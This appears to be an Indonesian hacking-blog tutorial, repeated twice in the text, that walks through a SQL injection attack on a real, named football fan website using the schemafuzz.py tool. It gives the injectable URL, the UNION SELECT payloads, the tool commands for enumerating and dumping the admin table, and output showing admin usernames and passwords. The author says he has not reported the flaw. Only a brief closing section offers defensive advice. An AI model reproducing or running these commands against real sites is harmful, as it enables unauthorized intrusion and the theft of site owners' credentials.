Hacking SQL Inject dengan schemafuzz.py
I. KATA PENGANTAR
-----------------
II. LANGKAH-LANGKAH AWAL
------------------------
1. Download Python : http://www.python.org/download/
2. Download Schemafuzz : http://www.kitaupload.com/download.php?file=581schemafuzz.py
3. Sini saya mendapatkan site penggila bola tp maaf ya bagi juventini aq gax ada mksd apa2 sma site kesayangan kalian , dengan segala kurang hormat site ini saya show up :)
pada admin web, :D. Contoh disini kita mendapatkan bug SQL pada www.juventus.co.id
4. URL:http://www.juventus.co.id/news.php?id_ref_menu=14' [SQLi]
III. PEMBAHASAN
---------------
5. Buka CMD trus cari lokasi Schemafuzz.py
Contoh disini lokasi Schemafuzz.py saya ada di drive C:/
6. Sekarang kita ketik pada command
C:\>schemafuzz.py -u "URL:http://www.juventus.co.id/news.php?id_ref_menu=14' [SQLi]
" --findcol
dan tampillah
||---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL:http://www.juventus.co.id/news.php?id_ref_menu=14--
[+] Evasion Used: "+" "--"
[+] 16:18:47
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 0
[+] SQLi URL: http://www.juventus.co.id/news.php?id_ref_menu=14+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://www.juventus.co.id/news.php?id_ref_menu=14+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5
[-] Done!
7. Sekarang untuk mencari info databasenya dan versi berapa yang dipake atau tabel, kita ketik sebagai berikut
C:\>schemafuzz.py -u "http://www.juventus.co.id/news.php?id_ref_menu=14+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5" --fuzz
dan akan tampil
||---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL:http://www.juventus.co.id/news.php?id_ref_menu=14+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 16:21:18
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: juvewebdb
User: juveweb@localhost
Version: 5.0.51b-community-nt
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249
[+] Searching for tables and columns...
[+] Found a table called: admin
[+] Now searching for columns inside table "admin"
[!] Found a column called:username
[!] Found a column called:password
[!] Found a column called:name
[-] Done searching inside table "admin" for columns!
8. Database: juvewebdb
User: juveweb@localhost
Version: 5.0.51b-community-nt
Kita telah lihat database, user, versi SQL dan table. Sekarang kita akan mencari username dan passwordnya
C:\>http://www.juventus.co.id/news.php?id_ref_menu=14+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5 --dump -D juvewebdb -T admin -C id,admin,name,username,password
dan akan tampil
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL:http://www.juventus.co.id/news.php?id_ref_menu=14+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 16:52:16
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: juvewebdb
User: juveweb@localhost
Version: 5.0.51b-community-nt
[+] Dumping data from database "juvewebdb" Table "admin"
[+] Column(s) ['id_admin', 'name', 'username', 'password']
[+] Number of Rows: 2
[0] 1:Administrator:admin:adminjuve:
[1] 2:Mazhters:Mazh:abcd:abcd:
[-] [16:52:37]
[-] Total URL Requests 4
[-] Done
9. Boooom........!!!!!!!
username : Bsa liat ndri kn user nya :)
password : Bsa liat ndri kn pass nya :)
10. Tp Saya blm melaporkan bug site tersebut dan mudah-mudahan adminnya lansung ambil tindakan.
IV. PESAN UNTUK ADMIN DAN WEB PROGRAMMER
----------------------------------------
1. Melakukan filter pada bug sql variable
variable $id tidak di filter sama sekali Karena biasanya variabel ini diharapkan berbentuk angka. Tapi tanpa filter seperti itu,
pengunjung bisa saja memasukkan query tambahan (sql injection).
2. Pencegahannya,kita harus Buat agar nilai $id selalu berbentuk angka.
3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
5. Up to date pada server webnya, Haaaaaaaaaa.............
V.PENUTUP
---------
Selesai deh penjelasan singkat saya teknik hacking SQL Injeck dengan menggunakan schemafuzz, tools ini hanyalah altrenative
bukannya saya mengajarkan kalian asik dan terus menerus memakai tools schemafuzz, sekalian kalian belajar bahasa pemogramman
web PHP,ASP,JSP,KSP,Etc. Karena tak selamanya tools bisa menyelesaikan segala cara, tools hanyalah media, yang selanjutnya
otak kita yang bekerja diibaratkan seperi kita sekolah / kuliah menggunakan alat tulis-menulis selanjutnya otaklah yang bekerja
Dengan segala kurang hormat saya minta maaf kalau ada kesalah pahaman dalam tutorial saya.
Pesan Pembaca : Gunakanlah ilmu atas dasar pembelajaran bukan atas dasar kejahatan karena ilmu pengetahuan itu baik dan apabila tuh dgnakan wat kjhtan leh klian maka saya tidak Responsible :))
" I Luv U Full "
<3
:D#anchi-duniayggelapndingin.blogspot.com #IT #smua komunitaz duniayggelapndingin#anchi-
Greetzz to:
duniayggelapndingin.blogspot.com
#IT
#smua komunitaz duniayggelapndingin
I. KATA PENGANTAR
-----------------
Ketemu lagi dengan saya anchi-ramsyi, disini saya akan menjelaskan teknik hacking SQL Inject dengan menggunakan Schemafuzz.
Schemafuzz adalah script hacking pemmogramman python, yang saya ambil di forum darkc0de. Di schemafuzz ini kita di mu-
dahkan untuk tester site / web, hanya dengan modal menguasai command atau perintahnya, kita bisa melihat isi database
pada site tersebut, tapi disini saya tidak mengajarkan kalian untuk melakukan tindak kejahatan atau kriminal pada site
disini saya hanya mau kalian menjadi baik dalam menggunakan ilmu pengetahuan. Karena hacking itu baik. Kayaknya cukup
deh saran saya untuk melakukan dengan bijak teknik hacking ini. Sekarang kita masuk dalam pokok pembahasan.
Schemafuzz adalah script hacking pemmogramman python, yang saya ambil di forum darkc0de. Di schemafuzz ini kita di mu-
dahkan untuk tester site / web, hanya dengan modal menguasai command atau perintahnya, kita bisa melihat isi database
pada site tersebut, tapi disini saya tidak mengajarkan kalian untuk melakukan tindak kejahatan atau kriminal pada site
disini saya hanya mau kalian menjadi baik dalam menggunakan ilmu pengetahuan. Karena hacking itu baik. Kayaknya cukup
deh saran saya untuk melakukan dengan bijak teknik hacking ini. Sekarang kita masuk dalam pokok pembahasan.
II. LANGKAH-LANGKAH AWAL
------------------------
1. Download Python : http://www.python.org/download/
2. Download Schemafuzz : http://www.kitaupload.com/download.php?file=581schemafuzz.py
3. Sini saya mendapatkan site penggila bola tp maaf ya bagi juventini aq gax ada mksd apa2 sma site kesayangan kalian , dengan segala kurang hormat site ini saya show up :)
pada admin web, :D. Contoh disini kita mendapatkan bug SQL pada www.juventus.co.id
4. URL:http://www.juventus.co.id/news.php?id_ref_menu=14' [SQLi]
III. PEMBAHASAN
---------------
5. Buka CMD trus cari lokasi Schemafuzz.py
Contoh disini lokasi Schemafuzz.py saya ada di drive C:/
6. Sekarang kita ketik pada command
C:\>schemafuzz.py -u "URL:http://www.juventus.co.id/news.php?id_ref_menu=14' [SQLi]
" --findcol
dan tampillah
||---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL:http://www.juventus.co.id/news.php?id_ref_menu=14--
[+] Evasion Used: "+" "--"
[+] 16:18:47
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 0
[+] SQLi URL: http://www.juventus.co.id/news.php?id_ref_menu=14+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://www.juventus.co.id/news.php?id_ref_menu=14+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5
[-] Done!
7. Sekarang untuk mencari info databasenya dan versi berapa yang dipake atau tabel, kita ketik sebagai berikut
C:\>schemafuzz.py -u "http://www.juventus.co.id/news.php?id_ref_menu=14+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5" --fuzz
dan akan tampil
||---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL:http://www.juventus.co.id/news.php?id_ref_menu=14+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 16:21:18
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: juvewebdb
User: juveweb@localhost
Version: 5.0.51b-community-nt
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249
[+] Searching for tables and columns...
[+] Found a table called: admin
[+] Now searching for columns inside table "admin"
[!] Found a column called:username
[!] Found a column called:password
[!] Found a column called:name
[-] Done searching inside table "admin" for columns!
8. Database: juvewebdb
User: juveweb@localhost
Version: 5.0.51b-community-nt
Kita telah lihat database, user, versi SQL dan table. Sekarang kita akan mencari username dan passwordnya
C:\>http://www.juventus.co.id/news.php?id_ref_menu=14+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5 --dump -D juvewebdb -T admin -C id,admin,name,username,password
dan akan tampil
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL:http://www.juventus.co.id/news.php?id_ref_menu=14+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 16:52:16
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: juvewebdb
User: juveweb@localhost
Version: 5.0.51b-community-nt
[+] Dumping data from database "juvewebdb" Table "admin"
[+] Column(s) ['id_admin', 'name', 'username', 'password']
[+] Number of Rows: 2
[0] 1:Administrator:admin:adminjuve:
[1] 2:Mazhters:Mazh:abcd:abcd:
[-] [16:52:37]
[-] Total URL Requests 4
[-] Done
9. Boooom........!!!!!!!
username : Bsa liat ndri kn user nya :)
password : Bsa liat ndri kn pass nya :)
10. Tp Saya blm melaporkan bug site tersebut dan mudah-mudahan adminnya lansung ambil tindakan.
IV. PESAN UNTUK ADMIN DAN WEB PROGRAMMER
----------------------------------------
1. Melakukan filter pada bug sql variable
variable $id tidak di filter sama sekali Karena biasanya variabel ini diharapkan berbentuk angka. Tapi tanpa filter seperti itu,
pengunjung bisa saja memasukkan query tambahan (sql injection).
2. Pencegahannya,kita harus Buat agar nilai $id selalu berbentuk angka.
3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
5. Up to date pada server webnya, Haaaaaaaaaa.............
V.PENUTUP
---------
Selesai deh penjelasan singkat saya teknik hacking SQL Injeck dengan menggunakan schemafuzz, tools ini hanyalah altrenative
bukannya saya mengajarkan kalian asik dan terus menerus memakai tools schemafuzz, sekalian kalian belajar bahasa pemogramman
web PHP,ASP,JSP,KSP,Etc. Karena tak selamanya tools bisa menyelesaikan segala cara, tools hanyalah media, yang selanjutnya
otak kita yang bekerja diibaratkan seperi kita sekolah / kuliah menggunakan alat tulis-menulis selanjutnya otaklah yang bekerja
Dengan segala kurang hormat saya minta maaf kalau ada kesalah pahaman dalam tutorial saya.
Pesan Pembaca : Gunakanlah ilmu atas dasar pembelajaran bukan atas dasar kejahatan karena ilmu pengetahuan itu baik dan apabila tuh dgnakan wat kjhtan leh klian maka saya tidak Responsible :))
" I Luv U Full "
<3
:D#anchi-duniayggelapndingin.blogspot.com #IT #smua komunitaz duniayggelapndingin#anchi-
Greetzz to:
duniayggelapndingin.blogspot.com
#IT
#smua komunitaz duniayggelapndingin
Comments (0)
Posting Komentar